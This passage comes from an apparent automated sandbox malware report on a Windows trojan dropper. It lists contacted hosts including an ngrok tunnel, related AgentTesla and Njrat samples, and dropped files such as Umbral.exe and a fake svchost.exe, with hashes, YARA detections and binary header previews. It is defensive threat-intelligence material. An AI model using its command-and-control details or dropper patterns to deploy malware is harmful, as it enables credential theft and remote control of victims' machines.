                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  208.95.112.1
                                                  		ip-api.comUnited States
                                                  		53334TUT-ASUSfalse
                                                  3.125.223.134
                                                  		unknownUnited States
                                                  		16509AMAZON-02UStrue
                                                  3.125.209.94
                                                  		unknownUnited States
                                                  		16509AMAZON-02UStrue
                                                  104.26.0.5
                                                  		keyauth.winUnited States
                                                  		13335CLOUDFLARENETUSfalse
                                                  3.124.142.205
                                                  		unknownUnited States
                                                  		16509AMAZON-02UStrue
                                                  18.158.249.75
                                                  		0.tcp.eu.ngrok.ioUnited States
                                                  		16509AMAZON-02UStrue

                                                  General Information

                                                  Joe Sandbox version:40.0.0 Tourmaline
                                                  Analysis ID:1429103
                                                  Start date and time:2024-04-20 21:31:07 +02:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 10m 23s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:17
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:KvS2rT08PQ.exe
                                                  renamed because original name is a hash value
                                                  Original Sample Name:2784277bd68152abf75c6c6d59fab7af.exe
                                                  Detection:MAL
                                                  Classification:mal100.spre.phis.troj.spyw.evad.winEXE@19/9@6/6
                                                  EGA Information:
                                                  • Successful, ratio: 50%
                                                  HCA Information:
                                                  • Successful, ratio: 56%
                                                  • Number of executed functions: 155
                                                  • Number of non-executed functions: 2
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 173.194.219.94, 173.194.219.120
                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, gstatic.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                  • Execution Graph export aborted for target KvS2rT08PQ.exe, PID 6500 because it is empty
                                                  • Execution Graph export aborted for target Umbral.exe, PID 2180 because it is empty
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  21:31:57API Interceptor1x Sleep call for process: WMIC.exe modified
                                                  21:31:58API Interceptor946846x Sleep call for process: ANDYzz-protected.exe modified
                                                  21:31:59API Interceptor1x Sleep call for process: Umbral.exe modified
                                                  21:32:31API Interceptor425848x Sleep call for process: svchost.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  208.95.112.1QUOTATION_APRQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  SecuriteInfo.com.Win32.PWSX-gen.25825.12964.exeGet hashmaliciousAgentTeslaBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  SecuriteInfo.com.Win32.SuspectCrc.28876.20318.xlsxGet hashmaliciousAgentTeslaBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  T1SEuO2fxi.exeGet hashmaliciousXehook StealerBrowse
                                                  • ip-api.com/json/?fields=11827
                                                  xnNcI6OenKJs.exeGet hashmaliciousQuasarBrowse
                                                  • ip-api.com/json/
                                                  T1SEuO2fxi.exeGet hashmaliciousXehook StealerBrowse
                                                  • ip-api.com/json/?fields=11827
                                                  rMayNewPurchase.exeGet hashmaliciousAgentTeslaBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  rRECEIPTTRANSFE.exeGet hashmaliciousAgentTeslaBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  charesworh.exeGet hashmaliciousAgentTeslaBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  FAR.N_2430-240009934.exeGet hashmaliciousAgentTeslaBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  3.125.223.134lLX6Po7hFJ.exeGet hashmaliciousNanocoreBrowse
                                                    aXDh3Stgy2.exeGet hashmaliciousNjratBrowse
                                                      AKsHpy5O2W.exeGet hashmaliciousNjratBrowse
                                                        P1Oyl92c7q.exeGet hashmaliciousNjratBrowse
                                                          Z5355AqwOr.exeGet hashmaliciousNjratBrowse
                                                            OkT2NAJRba.exeGet hashmaliciousNjratBrowse
                                                              aLbc2QiwYI.exeGet hashmaliciousNjratBrowse
                                                                G1oJ1idmVw.dllGet hashmaliciousGhostRatBrowse
                                                                  X1YSjOIudz.exeGet hashmaliciousNjratBrowse
                                                                    hitler.exeGet hashmaliciousNjratBrowse
                                                                      3.125.209.94xaa.doc.docxGet hashmaliciousCVE-2021-40444Browse
                                                                      • 259f-88-231-63-13.eu.ngrok.io/exploit.html

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      0.tcp.eu.ngrok.iolLX6Po7hFJ.exeGet hashmaliciousNanocoreBrowse
                                                                      • 3.125.223.134
                                                                      aXDh3Stgy2.exeGet hashmaliciousNjratBrowse
                                                                      • 18.158.249.75
                                                                      9VnALqFMbF.exeGet hashmaliciousDarkCometBrowse
                                                                      • 3.125.209.94
                                                                      AKsHpy5O2W.exeGet hashmaliciousNjratBrowse
                                                                      • 3.125.223.134
                                                                      D6p5mclMzu.exeGet hashmaliciousNjratBrowse
                                                                      • 3.124.142.205
                                                                      P1Oyl92c7q.exeGet hashmaliciousNjratBrowse
                                                                      • 3.124.142.205
                                                                      F1RBq1AGOt.exeGet hashmaliciousNjratBrowse
                                                                      • 3.125.209.94
                                                                      8egiXe8bX1.exeGet hashmaliciousRedLineBrowse
                                                                      • 3.125.102.39
                                                                      hIn6sixPtb.exeGet hashmaliciousNjratBrowse
                                                                      • 3.124.142.205
                                                                      chrome.exeGet hashmaliciousXWormBrowse
                                                                      • 18.192.31.165
                                                                      keyauth.winSecuriteInfo.com.Win64.TrojanX-gen.26710.19883.exeGet hashmaliciousUnknownBrowse
                                                                      • 104.26.0.5
                                                                      RAvynkVRMR.exeGet hashmaliciousUnknownBrowse
                                                                      • 104.26.0.5
                                                                      RAvynkVRMR.exeGet hashmaliciousUnknownBrowse
                                                                      • 104.26.0.5
                                                                      loader.exeGet hashmaliciousBinder HackTool, XWormBrowse
                                                                      • 104.26.0.5
                                                                      SecuriteInfo.com.Win32.MalwareX-gen.21073.8844.exeGet hashmaliciousUnknownBrowse
                                                                      • 104.26.0.5
                                                                      SecuriteInfo.com.Win32.MalwareX-gen.21073.8844.exeGet hashmaliciousUnknownBrowse
                                                                      • 104.26.0.5
                                                                      vIXP03a.exeGet hashmaliciousUnknownBrowse
                                                                      • 104.26.0.5
                                                                      SecuriteInfo.com.Win32.MalwareX-gen.12374.8764.exeGet hashmaliciousUnknownBrowse
                                                                      • 104.26.0.5
                                                                      SecuriteInfo.com.Win32.MalwareX-gen.12374.8764.exeGet hashmaliciousUnknownBrowse
                                                                      • 104.26.0.5
                                                                      SecuriteInfo.com.Win64.TrojanX-gen.21257.15643.exeGet hashmaliciousUnknownBrowse
                                                                      • 104.26.0.5
                                                                      ip-api.comQUOTATION_APRQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 208.95.112.1
                                                                      SecuriteInfo.com.Win32.PWSX-gen.25825.12964.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 208.95.112.1
                                                                      SecuriteInfo.com.Win32.SuspectCrc.28876.20318.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                      • 208.95.112.1
                                                                      T1SEuO2fxi.exeGet hashmaliciousXehook StealerBrowse
                                                                      • 208.95.112.1
                                                                      xnNcI6OenKJs.exeGet hashmaliciousQuasarBrowse
                                                                      • 208.95.112.1
                                                                      T1SEuO2fxi.exeGet hashmaliciousXehook StealerBrowse
                                                                      • 208.95.112.1
                                                                      rMayNewPurchase.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 208.95.112.1
                                                                      rRECEIPTTRANSFE.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 208.95.112.1
                                                                      charesworh.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 208.95.112.1
                                                                      FAR.N_2430-240009934.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 208.95.112.1

                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      AMAZON-02UShttp://134.213.29.14:82/grep.x86_64Get hashmaliciousUnknownBrowse
                                                                      • 3.163.115.8
                                                                      lLX6Po7hFJ.exeGet hashmaliciousNanocoreBrowse
                                                                      • 18.158.249.75
                                                                      qk9TaBBxh8.exeGet hashmaliciousLummaC, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                      • 52.216.33.65
                                                                      https://prayas.co/assets/nagateliteqfuk.exeGet hashmaliciousUnknownBrowse
                                                                      • 3.72.134.250
                                                                      https://19apmic17.z13.web.core.windows.net/Get hashmaliciousTechSupportScamBrowse
                                                                      • 3.161.188.93
                                                                      https://bestjavporn58xxcom.z13.web.core.windows.net/index.htmlGet hashmaliciousUnknownBrowse
                                                                      • 108.138.82.189
                                                                      https://hentaieracomxx.z13.web.core.windows.net/index.htmlGet hashmaliciousUnknownBrowse
                                                                      • 108.138.82.203
                                                                      PO_PDF24172024.scr.exeGet hashmaliciousFormBookBrowse
                                                                      • 75.2.60.5
                                                                      https://19apmic11.z13.web.core.windows.net/Get hashmaliciousTechSupportScamBrowse
                                                                      • 99.86.229.70
                                                                      https://allmylinkswebgt.z13.web.core.windows.net/index.htmlGet hashmaliciousUnknownBrowse
                                                                      • 108.138.82.231
                                                                      AMAZON-02UShttp://134.213.29.14:82/grep.x86_64Get hashmaliciousUnknownBrowse
                                                                      • 3.163.115.8
                                                                      lLX6Po7hFJ.exeGet hashmaliciousNanocoreBrowse
                                                                      • 18.158.249.75
                                                                      qk9TaBBxh8.exeGet hashmaliciousLummaC, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                      • 52.216.33.65
                                                                      https://prayas.co/assets/nagateliteqfuk.exeGet hashmaliciousUnknownBrowse
                                                                      • 3.72.134.250
                                                                      https://19apmic17.z13.web.core.windows.net/Get hashmaliciousTechSupportScamBrowse
                                                                      • 3.161.188.93
                                                                      https://bestjavporn58xxcom.z13.web.core.windows.net/index.htmlGet hashmaliciousUnknownBrowse
                                                                      • 108.138.82.189
                                                                      https://hentaieracomxx.z13.web.core.windows.net/index.htmlGet hashmaliciousUnknownBrowse
                                                                      • 108.138.82.203
                                                                      PO_PDF24172024.scr.exeGet hashmaliciousFormBookBrowse
                                                                      • 75.2.60.5
                                                                      https://19apmic11.z13.web.core.windows.net/Get hashmaliciousTechSupportScamBrowse
                                                                      • 99.86.229.70
                                                                      https://allmylinkswebgt.z13.web.core.windows.net/index.htmlGet hashmaliciousUnknownBrowse
                                                                      • 108.138.82.231
                                                                      AMAZON-02UShttp://134.213.29.14:82/grep.x86_64Get hashmaliciousUnknownBrowse
                                                                      • 3.163.115.8
                                                                      lLX6Po7hFJ.exeGet hashmaliciousNanocoreBrowse
                                                                      • 18.158.249.75
                                                                      qk9TaBBxh8.exeGet hashmaliciousLummaC, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                      • 52.216.33.65
                                                                      https://prayas.co/assets/nagateliteqfuk.exeGet hashmaliciousUnknownBrowse
                                                                      • 3.72.134.250
                                                                      https://19apmic17.z13.web.core.windows.net/Get hashmaliciousTechSupportScamBrowse
                                                                      • 3.161.188.93
                                                                      https://bestjavporn58xxcom.z13.web.core.windows.net/index.htmlGet hashmaliciousUnknownBrowse
                                                                      • 108.138.82.189
                                                                      https://hentaieracomxx.z13.web.core.windows.net/index.htmlGet hashmaliciousUnknownBrowse
                                                                      • 108.138.82.203
                                                                      PO_PDF24172024.scr.exeGet hashmaliciousFormBookBrowse
                                                                      • 75.2.60.5
                                                                      https://19apmic11.z13.web.core.windows.net/Get hashmaliciousTechSupportScamBrowse
                                                                      • 99.86.229.70
                                                                      https://allmylinkswebgt.z13.web.core.windows.net/index.htmlGet hashmaliciousUnknownBrowse
                                                                      • 108.138.82.231
                                                                      CLOUDFLARENETUSSecuriteInfo.com.Win64.Malware-gen.26781.23689.exeGet hashmaliciousUnknownBrowse
                                                                      • 104.21.81.28
                                                                      SajWKdHxdF.exeGet hashmaliciousRisePro StealerBrowse
                                                                      • 104.26.5.15
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.15.198
                                                                      file.exeGet hashmaliciousRisePro StealerBrowse
                                                                      • 104.26.4.15
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 172.67.177.98
                                                                      2M1NS61GG8.exeGet hashmaliciousLummaC, DarkTortilla, LummaC Stealer, PureLog Stealer, RedLine, zgRATBrowse
                                                                      • 172.67.129.243
                                                                      RrHuyQ4GzG.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.86.106
                                                                      https://track.enterprisetechsol.com/z.z?l=aHR0cHM6Ly9yZXNvdXJjZS5pdGJ1c2luZXNzdG9kYXkuY29tL3doaXRlcGFwZXJzLzQ0ODAzLU1pY3Jvc29mdC1DUEwtUTItUE1HLUFCTS1HZXItMS1sYW5kaW5nLnBocD9lPWJvbnVjY2VsbGkuZGFyaW9AZGVtZS1ncm91cC5jb20=&r=14547470367&d=12037165&p=1&t=h&h=fb97401a549b1167a78f6002a0aef94dGet hashmaliciousUnknownBrowse
                                                                      • 172.67.74.40
                                                                      jNeaezBuo8.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                      • 104.21.4.208
                                                                      74fa486WVX.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                      • 104.21.76.57
                                                                      TUT-ASUSQUOTATION_APRQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 208.95.112.1
                                                                      SecuriteInfo.com.Win32.PWSX-gen.25825.12964.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 208.95.112.1
                                                                      SecuriteInfo.com.Win32.SuspectCrc.28876.20318.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                      • 208.95.112.1
                                                                      T1SEuO2fxi.exeGet hashmaliciousXehook StealerBrowse
                                                                      • 208.95.112.1
                                                                      xnNcI6OenKJs.exeGet hashmaliciousQuasarBrowse
                                                                      • 208.95.112.1
                                                                      T1SEuO2fxi.exeGet hashmaliciousXehook StealerBrowse
                                                                      • 208.95.112.1
                                                                      rMayNewPurchase.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 208.95.112.1
                                                                      rRECEIPTTRANSFE.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 208.95.112.1
                                                                      charesworh.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 208.95.112.1
                                                                      FAR.N_2430-240009934.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 208.95.112.1

                                                                      JA3 Fingerprints

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      3b5074b1b5d032e5620f69f9f700ff0e2M1NS61GG8.exeGet hashmaliciousLummaC, DarkTortilla, LummaC Stealer, PureLog Stealer, RedLine, zgRATBrowse
                                                                      • 104.26.0.5
                                                                      Receipt_7814002.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                      • 104.26.0.5
                                                                      fP4kybhBWi.exeGet hashmaliciousQuasarBrowse
                                                                      • 104.26.0.5
                                                                      VN24A02765.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 104.26.0.5
                                                                      ShippingOrder_ GSHS2400052.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                      • 104.26.0.5
                                                                      SecuriteInfo.com.Win32.PWSX-gen.25825.12964.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 104.26.0.5
                                                                      0OqTUkeaoD.exeGet hashmaliciousRedLineBrowse
                                                                      • 104.26.0.5
                                                                      IMG_210112052.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                      • 104.26.0.5
                                                                      https://keenetownhall-my.sharepoint.com/:b:/g/personal/amanda_keenetownhall_org/ESKbqbSIMj5ElsbdsfaEg7oBgkFm5H_JqS97uaySzVhJDQ?e=KMMz4yGet hashmaliciousHTMLPhisherBrowse
                                                                      • 104.26.0.5
                                                                      https://www.canva.com/design/DAGC4eUhMw0/cKr_ImwjL8JW0nUMNMi5QA/view?utm_content=DAGC4eUhMw0&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                      • 104.26.0.5

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\KvS2rT08PQ.exe.log

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\KvS2rT08PQ.exe
                                                                      File Type:CSV text
                                                                      Category:dropped
                                                                      Size (bytes):654
                                                                      Entropy (8bit):5.380476433908377
                                                                      Encrypted:false
                                                                      SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                      MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                      SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                      SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                      SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Umbral.exe.log

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\Umbral.exe
                                                                      File Type:CSV text
                                                                      Category:dropped
                                                                      Size (bytes):1492
                                                                      Entropy (8bit):5.3787668257697945
                                                                      Encrypted:false
                                                                      SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhwE4ksKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6owHptHTHf
                                                                      MD5:761D1106534DF52590D691CAD8962C57
                                                                      SHA1:D3678D8F8635FF85D354F7EE2FFC24008357DC5B
                                                                      SHA-256:73784F8EEA9F790E13C7DA5137D0735B161D974DE8F748ABFD4A3951CE91FAB2
                                                                      SHA-512:AA3595F2936C95C599C6E8C2784CA18FDC7DE34F290D38B56FCC52D82CDCBF002EAE0BB16DD6355DC8AD85F6DCC69246FD3D07274A49C9914F4769F256BA16ED
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System

                                                                      C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\KvS2rT08PQ.exe
                                                                      File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):2581504
                                                                      Entropy (8bit):7.846145477617643
                                                                      Encrypted:false
                                                                      SSDEEP:49152:erEG28A6+EsLdcMobsUobQieITYbNbNWo4kSH3OqtwInxBmew+W7SC:l89qpcMwsUwQieIT4bNJFY3OqtD2
                                                                      MD5:33EB68C8C4FC521D64ED82219CDB19F2
                                                                      SHA1:2D114152924EA141DF11082D6F337BF7E9A81035
                                                                      SHA-256:24251C6105A1F345DBB16860C2405647127B8B03E03B0D0C1C61F896A6C7B7B0
                                                                      SHA-512:0B5090DBB977AC8B79B01A3D33C26592A7B98BD9461212F70FA3C092B359C93AD22C1C4BACE3AACC22C74884B154989BE2A724EDF74EFD20EF80DEE78AC75F8A
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe, Author: Joe Security
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 50%
                                                                      • Antivirus: Virustotal, Detection: 65%, Browse
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...TCe..........."...0.................. ....@...... ........................'...........`...@......@............... ................................'.............................................................................................. ..H...........f.g...en,a... ...b..................@...f.g...en,a.......b...f..............@....text........ ...................... ..`.rsrc.........'......R'.............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\Umbral.exe

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\KvS2rT08PQ.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):236544
                                                                      Entropy (8bit):6.0804586306351585
                                                                      Encrypted:false
                                                                      SSDEEP:6144:xloZMkrIkd8g+EtXHkv/iD4WRxg2U7X8qtoGnnG4ib8e1mVzWi:DoZrL+EP8WRxg2U7X8qtoGnnGPYn
                                                                      MD5:774FA31E76AF56BBAD395E1E3AC68721
                                                                      SHA1:FE65C14179B2CF0CBD44758578CF878D7DCEF879
                                                                      SHA-256:944C19F992F5301AC8936DCDBD4EFB59FBC4F47DCDCC39A77B5E87B4EFFD27F4
                                                                      SHA-512:529BA2A356BF4FB3D4820C0DA1DCA58D1583AE37188E61300190D543144140F0F73072A9FAF195DC214A13AC8C365354E2AB212A24646A332085481F47DE8C7E
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\Umbral.exe, Author: Joe Security
                                                                      • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: C:\Users\user\AppData\Local\Temp\Umbral.exe, Author: Joe Security
                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\Umbral.exe, Author: ditekSHen
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 88%
                                                                      • Antivirus: Virustotal, Detection: 70%, Browse
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.a..........."...0.................. ........@.. ....................................`....................................K.......P............................................................................ ............... ..H............text...$.... ...................... ..`.rsrc...P...........................@..@.reloc..............................@..B........................H.......@...t.......6.....................................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. ... )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*...0..w.............%.o...(.........~....s..........]..........~.....".".~.....\.\.~......b.~.......f.~.......n.~.......r.~...

                                                                      C:\Users\user\AppData\Local\Temp\svchost.exe

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\KvS2rT08PQ.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):95232
                                                                      Entropy (8bit):5.564497749908184
                                                                      Encrypted:false
                                                                      SSDEEP:1536:PlwC+xhUa9urgOBPmNvM4jEwzGi1dD5DR0gS:PlmUa9urgOkdGi1dl7
                                                                      MD5:3071F4F7B11A6BF6C623E83EED6D2418
                                                                      SHA1:37FD78D1296659109F2C94C9C750B5A98D158F11
                                                                      SHA-256:508BCD1A6B7ED82E60873EB1B035647EC9F8F9FACDF65D6D6A73B8EF37D5BB9E
                                                                      SHA-512:E6BC32A3C955F80A9A54C261722F49032C1F32C50F98F0792AF85769B87B4E9EF16EE4FD4F1E9E0A991E6F9311D54DB99737401E6B5F32B503531E6859AD45B8
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: unknown
                                                                      • Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Florian Roth
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: ditekSHen
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 100%
                                                                      • Antivirus: Virustotal, Detection: 77%, Browse
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....+.f.................p............... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text....o... ...p.................. ..`.reloc...............r..............@..B................................................................H.......................................................................&.(......**..(......*.s.........s ........s!........s".........*.0...........~....o#....+..*.0...........~....o$....+..*.0...........~....o%....+..*.0...........~....o&....+..*.0.............(....(.....+..*...0............(.....+..*.0................(.....+..*.0............(.....+..*.0.. ...................,.(...+.+.+....+...*.0...........................**..(......*....0..&........~..............,.(...+.

                                                                      C:\Users\user\AppData\Roaming\app

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):5
                                                                      Entropy (8bit):2.321928094887362
                                                                      Encrypted:false
                                                                      SSDEEP:3:m:m
                                                                      MD5:53CE6D1AE8885B5D12E654469F456C83
                                                                      SHA1:9D8B30C523DDEF4D24134072B27716BEC7D94D6F
                                                                      SHA-256:D7EBF92AD6E3BC44FBC3CFBB234EF4AFAFD7EA339F712229641A2849B6F87CE2
                                                                      SHA-512:C15DF9281E9CCBB8D30E24E751B77A030E734F8CDA4BD9482D3CA02F6B23E463A8E90DDD78A582CA059E57B8D0492C22583D792BC7368094FFC06E12CD145D9D
                                                                      Malicious:false
                                                                      Preview:.20

                                                                      \Device\ConDrv

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\netsh.exe
